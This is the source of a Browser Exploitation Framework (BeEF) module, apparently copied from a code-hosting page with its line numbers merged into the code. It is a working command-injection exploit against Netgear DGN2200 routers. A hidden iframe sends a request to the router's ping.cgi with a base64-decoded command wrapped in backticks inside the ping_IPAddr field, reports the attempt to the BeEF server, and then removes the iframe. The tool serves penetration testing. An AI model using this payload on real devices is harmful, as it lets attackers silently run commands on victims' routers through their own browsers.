Path: blob/master/modules/exploits/router/netgear_dgn2200_cmd_exec/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var rhost = '<%= @rhost %>';9var cmd = '<%= Base64.strict_encode64(@cmd) %>';10var timeout = 15;1112var netgear_dgn2200_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();1314netgear_dgn2200_iframe_<%= @command_id %>.setAttribute('src',"http://" + rhost + "/ping.cgi?IPAddr1=8&IPAddr2=8&IPAddr3=8&IPAddr4=8&ping=Ping&ess_=" + Math.random().toString(36).substring(2,10) + "&ping_IPAddr=`" + beef.encode.base64.decode(cmd) + "`");1516beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");171819cleanup = function() {20document.body.removeChild(netgear_dgn2200_iframe_<%= @command_id %>);21}22setTimeout("cleanup()", timeout*1000);2324});25262728